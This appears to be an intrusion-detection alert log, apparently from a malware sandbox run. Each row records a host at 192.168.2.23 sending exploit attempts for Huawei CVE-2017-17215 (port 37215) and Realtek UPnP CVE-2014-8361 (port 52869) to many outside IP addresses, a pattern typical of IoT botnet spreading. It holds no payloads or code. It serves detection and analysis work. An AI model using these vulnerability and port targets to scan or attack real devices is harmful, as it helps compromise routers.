                                      07/20/24-23:01:27.730585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4196837215192.168.2.23197.113.144.195
                                      07/20/24-23:01:43.686153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5091852869192.168.2.23172.233.108.76
                                      07/20/24-23:01:51.113660TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23701052869192.168.2.23140.189.156.39
                                      07/20/24-23:01:11.822392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838637215192.168.2.23116.78.34.252
                                      07/20/24-23:02:00.234228TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615024052869192.168.2.23125.137.181.188
                                      07/20/24-23:01:53.021606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24920652869192.168.2.2337.140.130.170
                                      07/20/24-23:01:44.054567TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5328652869192.168.2.2363.75.166.170
                                      07/20/24-23:01:08.556804TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25765852869192.168.2.2323.94.137.105
                                      07/20/24-23:01:02.095698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3525037215192.168.2.2399.184.135.95
                                      07/20/24-23:01:43.121284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011252869192.168.2.2387.254.251.88
                                      07/20/24-23:01:43.966760TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5633052869192.168.2.23150.220.0.209
                                      07/20/24-23:01:45.202570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4356052869192.168.2.23193.12.149.189
                                      07/20/24-23:01:47.859927TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25321652869192.168.2.23108.210.234.252
                                      07/20/24-23:01:00.641498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426037215192.168.2.2325.6.33.130
                                      07/20/24-23:01:12.813695TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5742252869192.168.2.23112.132.188.245
                                      07/20/24-23:02:09.321968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615148252869192.168.2.23213.67.172.218
                                      07/20/24-23:01:34.044223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356637215192.168.2.23157.191.169.80
                                      07/20/24-23:01:13.618084TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4587852869192.168.2.2343.124.104.253
                                      07/20/24-23:01:42.069870TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25872452869192.168.2.23191.61.198.111
                                      07/20/24-23:01:53.560520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4364852869192.168.2.2346.82.140.27
                                      07/20/24-23:01:42.995118TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6043052869192.168.2.23161.210.183.51
                                      07/20/24-23:00:59.192052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004037215192.168.2.2341.124.29.47
                                      07/20/24-23:01:08.652877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3477452869192.168.2.2386.219.42.227
                                      07/20/24-23:01:42.629036TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24527652869192.168.2.23211.87.162.144
                                      07/20/24-23:01:41.637960TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24070652869192.168.2.2395.50.29.160
                                      07/20/24-23:02:53.636754TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613431252869192.168.2.2343.198.199.207
                                      07/20/24-23:01:08.614193TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5903652869192.168.2.23219.105.54.148
                                      07/20/24-23:01:45.926465TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23584052869192.168.2.23213.132.50.155
                                      07/20/24-23:01:40.307219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438637215192.168.2.2341.199.42.244
                                      07/20/24-23:01:41.374418TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615591652869192.168.2.2393.148.210.215
                                      07/20/24-23:01:43.110964TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614060052869192.168.2.2325.194.48.207
                                      07/20/24-23:01:20.131339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3809837215192.168.2.23157.9.9.217
                                      07/20/24-23:01:58.152789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3836252869192.168.2.2370.101.195.243
                                      07/20/24-23:01:25.044669TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613959452869192.168.2.23117.200.16.247
                                      07/20/24-23:01:45.095767TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25804252869192.168.2.23156.160.38.108
                                      07/20/24-23:01:31.317774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5559252869192.168.2.2335.92.216.124
                                      07/20/24-23:01:42.486106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5472852869192.168.2.23193.19.81.156
                                      07/20/24-23:01:57.747300TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5758452869192.168.2.23187.17.35.77
                                      07/20/24-23:01:54.947006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6054652869192.168.2.23105.224.21.3
                                      07/20/24-23:01:08.638880TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23802452869192.168.2.23103.18.195.93
                                      07/20/24-23:01:32.034562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4810637215192.168.2.23157.115.47.163
                                      07/20/24-23:01:43.177552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615851252869192.168.2.2383.205.44.142
                                      07/20/24-23:01:40.334933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510037215192.168.2.23197.45.233.176
                                      07/20/24-23:01:42.131607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613375052869192.168.2.23157.252.110.127
                                      07/20/24-23:01:43.567356TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23951652869192.168.2.23187.122.130.75
                                      07/20/24-23:01:49.207937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3781652869192.168.2.23135.128.96.121
                                      07/20/24-23:01:42.357440TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614391852869192.168.2.23128.83.244.58
                                      07/20/24-23:01:42.466150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5492452869192.168.2.2374.205.109.96
                                      07/20/24-23:01:44.963815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4294252869192.168.2.2353.50.156.29
                                      07/20/24-23:01:43.117484TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614878052869192.168.2.2357.81.97.111
                                      07/20/24-23:00:59.168569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470237215192.168.2.23221.83.41.173
                                      07/20/24-23:01:21.936545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4550237215192.168.2.23157.80.129.250
                                      07/20/24-23:01:34.053061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808437215192.168.2.2384.170.188.89
                                      07/20/24-23:01:02.055683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870037215192.168.2.23157.224.12.67
                                      07/20/24-23:01:42.693536TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3304252869192.168.2.23107.163.195.19
                                      07/20/24-23:01:44.870961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3421652869192.168.2.2312.215.198.66
                                      07/20/24-23:01:50.370395TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3304652869192.168.2.23166.191.111.147
                                      07/20/24-23:01:03.186337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5666052869192.168.2.23166.7.60.196
                                      07/20/24-23:01:06.975117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495837215192.168.2.23152.142.62.185
                                      07/20/24-23:01:44.358680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4021252869192.168.2.23178.91.194.150
                                      07/20/24-23:01:42.608153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614014452869192.168.2.23138.229.180.34
                                      07/20/24-23:01:02.055683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446237215192.168.2.2341.227.37.208
                                      07/20/24-23:01:02.045831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576437215192.168.2.23197.235.104.194
                                      07/20/24-23:01:42.719940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25069252869192.168.2.23106.219.50.159
                                      07/20/24-23:01:44.922746TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3625852869192.168.2.23187.34.215.18
                                      07/20/24-23:01:27.660099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625037215192.168.2.2366.67.190.136
                                      07/20/24-23:01:44.971718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4483052869192.168.2.23213.131.100.211
                                      07/20/24-23:01:56.287639TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613858252869192.168.2.2370.135.187.127
                                      07/20/24-23:01:42.985200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614599452869192.168.2.23169.196.10.52
                                      07/20/24-23:01:48.322055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4228252869192.168.2.23172.42.36.143
                                      07/20/24-23:01:08.639622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5087452869192.168.2.23203.236.42.147
                                      07/20/24-23:01:11.660067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235637215192.168.2.23157.108.55.229
                                      07/20/24-23:01:47.614619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5902052869192.168.2.23154.117.210.216
                                      07/20/24-23:01:49.167711TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3902852869192.168.2.23157.109.59.232
                                      07/20/24-23:01:00.634165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435837215192.168.2.23197.67.20.2
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230837215192.168.2.23157.37.182.204
                                      07/20/24-23:01:46.444461TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4752652869192.168.2.23151.244.29.112
                                      07/20/24-23:01:08.639622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592452869192.168.2.23196.0.98.90
                                      07/20/24-23:01:54.901420TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4442852869192.168.2.23219.217.14.87
                                      07/20/24-23:01:42.479337TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24574052869192.168.2.23205.156.124.10
                                      07/20/24-23:00:59.161892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3563437215192.168.2.23197.19.12.241
                                      07/20/24-23:01:00.641803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.23197.103.118.184
                                      07/20/24-23:01:08.623583TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3550252869192.168.2.23111.160.194.136
                                      07/20/24-23:01:04.192511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5848452869192.168.2.23186.129.229.179
                                      07/20/24-23:01:43.224525TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5168052869192.168.2.23174.138.8.92
                                      07/20/24-23:01:54.787983TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24758052869192.168.2.2367.148.56.97
                                      07/20/24-23:01:56.353592TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613976852869192.168.2.23202.177.22.97
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603837215192.168.2.2327.153.202.8
                                      07/20/24-23:01:51.213578TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4116052869192.168.2.2313.35.187.229
                                      07/20/24-23:01:01.852700TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615004452869192.168.2.23106.250.20.58
                                      07/20/24-23:01:04.240033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849637215192.168.2.2332.245.170.235
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625037215192.168.2.23187.11.252.34
                                      07/20/24-23:01:11.630572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372037215192.168.2.2341.206.63.145
                                      07/20/24-23:01:08.691384TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5145852869192.168.2.23154.97.74.140
                                      07/20/24-23:01:51.266026TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25032052869192.168.2.23120.82.97.31
                                      07/20/24-23:01:43.659105TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24389252869192.168.2.23128.128.73.171
                                      07/20/24-23:01:49.231608TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24595452869192.168.2.2342.66.196.35
                                      07/20/24-23:01:43.586276TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23288252869192.168.2.23177.64.16.178
                                      07/20/24-23:01:08.575986TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25764252869192.168.2.23162.63.105.168
                                      07/20/24-23:01:46.261026TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613857652869192.168.2.23118.191.35.155
                                      07/20/24-23:01:55.797133TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5526252869192.168.2.23163.86.195.181
                                      07/20/24-23:01:53.923127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614621652869192.168.2.2378.233.35.58
                                      07/20/24-23:02:15.054105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5649252869192.168.2.23153.55.136.220
                                      07/20/24-23:01:06.989167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488237215192.168.2.2341.134.100.161
                                      07/20/24-23:01:31.981855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383837215192.168.2.238.134.141.9
                                      07/20/24-23:02:17.231770TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24778852869192.168.2.2384.123.73.220
                                      07/20/24-23:01:42.115778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5972052869192.168.2.2387.53.250.191
                                      07/20/24-23:01:44.589820TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5558452869192.168.2.23188.20.150.72
                                      07/20/24-23:01:42.677933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23706252869192.168.2.2332.146.19.98
                                      07/20/24-23:01:00.633385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538437215192.168.2.23157.243.7.84
                                      07/20/24-23:01:14.105395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260237215192.168.2.23221.45.252.241
                                      07/20/24-23:01:49.743796TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24664852869192.168.2.23177.220.208.210
                                      07/20/24-23:01:02.046626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285437215192.168.2.23197.235.3.106
                                      07/20/24-23:01:20.149798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845637215192.168.2.23157.163.36.247
                                      07/20/24-23:01:43.669446TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614774252869192.168.2.23218.231.87.4
                                      07/20/24-23:01:11.639230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3899037215192.168.2.23157.62.189.35
                                      07/20/24-23:01:46.495508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4459052869192.168.2.23207.214.48.137
                                      07/20/24-23:01:27.655551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254037215192.168.2.2341.119.179.108
                                      07/20/24-23:01:50.176893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3635452869192.168.2.23216.183.225.201
                                      07/20/24-23:02:04.748522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4777852869192.168.2.2397.69.50.199
                                      07/20/24-23:01:34.043865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855037215192.168.2.23157.8.209.32
                                      07/20/24-23:01:02.359782TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5776452869192.168.2.23169.193.81.146
                                      07/20/24-23:01:11.827498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251237215192.168.2.2392.168.171.93
                                      07/20/24-23:01:41.620386TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25028252869192.168.2.23111.66.162.186
                                      07/20/24-23:01:03.439543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4495452869192.168.2.2360.99.150.220
                                      07/20/24-23:01:25.766611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5103252869192.168.2.2371.185.104.236
                                      07/20/24-23:01:44.210939TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24726652869192.168.2.2338.105.221.242
                                      07/20/24-23:01:52.144379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5895252869192.168.2.23130.119.229.116
                                      07/20/24-23:01:41.343266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5493652869192.168.2.23220.17.179.230
                                      07/20/24-23:01:51.833558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3483252869192.168.2.2343.180.222.83
                                      07/20/24-23:02:01.357047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4906852869192.168.2.23185.217.197.57
                                      07/20/24-23:01:10.491660TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613969652869192.168.2.2344.76.102.214
                                      07/20/24-23:02:01.964831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3508452869192.168.2.2343.175.201.8
                                      07/20/24-23:01:47.893677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3410652869192.168.2.2391.148.233.46
                                      07/20/24-23:01:40.286738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490437215192.168.2.23157.149.48.241
                                      07/20/24-23:01:31.982478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677237215192.168.2.2319.181.181.97
                                      07/20/24-23:01:58.208327TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5051252869192.168.2.23125.12.65.53
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4651037215192.168.2.23157.61.177.250
                                      07/20/24-23:00:57.222254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414237215192.168.2.23197.5.25.5
                                      07/20/24-23:01:34.044717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616237215192.168.2.23157.172.112.67
                                      07/20/24-23:01:49.198416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23303252869192.168.2.2351.131.43.210
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297837215192.168.2.23197.13.249.251
                                      07/20/24-23:01:43.180913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5338252869192.168.2.23129.164.36.164
                                      07/20/24-23:01:51.220119TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23508852869192.168.2.2346.50.151.45
                                      07/20/24-23:02:07.236630TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613763852869192.168.2.23120.153.158.217
                                      07/20/24-23:01:56.510714TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4070052869192.168.2.23198.12.218.135
                                      07/20/24-23:01:25.517399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615090052869192.168.2.23220.87.191.244
                                      07/20/24-23:01:08.919725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24675852869192.168.2.2312.55.180.198
                                      07/20/24-23:01:57.688478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6097052869192.168.2.23102.142.123.212
                                      07/20/24-23:01:49.946258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4293652869192.168.2.23168.75.31.114
                                      07/20/24-23:01:50.085627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5261852869192.168.2.23151.41.38.224
                                      07/20/24-23:01:46.556921TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25659252869192.168.2.2381.48.180.48
                                      07/20/24-23:02:26.420170TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614459852869192.168.2.23203.88.251.194
                                      07/20/24-23:01:58.821906TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5120852869192.168.2.2317.116.47.253
                                      07/20/24-23:01:41.249014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615835052869192.168.2.23162.227.232.27
                                      07/20/24-23:02:06.453402TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613472452869192.168.2.23186.206.219.37
                                      07/20/24-23:01:43.206219TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615416652869192.168.2.2339.170.42.160
                                      07/20/24-23:01:14.014458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921837215192.168.2.23197.8.46.56
                                      07/20/24-23:01:44.411586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3502252869192.168.2.2327.36.59.232
                                      07/20/24-23:01:56.378725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5055452869192.168.2.2378.1.44.43
                                      07/20/24-23:01:20.169339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318237215192.168.2.23157.202.95.80
                                      07/20/24-23:02:48.447183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614504052869192.168.2.23165.223.82.19
                                      07/20/24-23:01:26.849112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278037215192.168.2.2341.245.227.231
                                      07/20/24-23:02:02.671155TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4312052869192.168.2.2335.30.208.203
                                      07/20/24-23:01:43.058685TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614442852869192.168.2.2384.198.11.250
                                      07/20/24-23:01:49.231608TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4225252869192.168.2.23124.13.0.132
                                      07/20/24-23:01:54.979156TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23711852869192.168.2.23122.69.178.214
                                      07/20/24-23:02:02.570955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6041452869192.168.2.2332.154.214.30
                                      07/20/24-23:01:40.331150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860637215192.168.2.2374.131.241.182
                                      07/20/24-23:01:40.279669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006437215192.168.2.23157.182.220.13
                                      07/20/24-23:01:45.148866TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3346852869192.168.2.23210.80.122.96
                                      07/20/24-23:01:48.007334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3944252869192.168.2.2317.76.42.20
                                      07/20/24-23:02:03.085082TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24862252869192.168.2.23167.172.23.251
                                      07/20/24-23:01:42.758824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614500452869192.168.2.238.202.120.94
                                      07/20/24-23:01:58.880225TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24875452869192.168.2.2349.65.211.106
                                      07/20/24-23:01:08.631492TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24435852869192.168.2.23223.193.169.99
                                      07/20/24-23:01:00.637175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5933437215192.168.2.2397.43.136.85
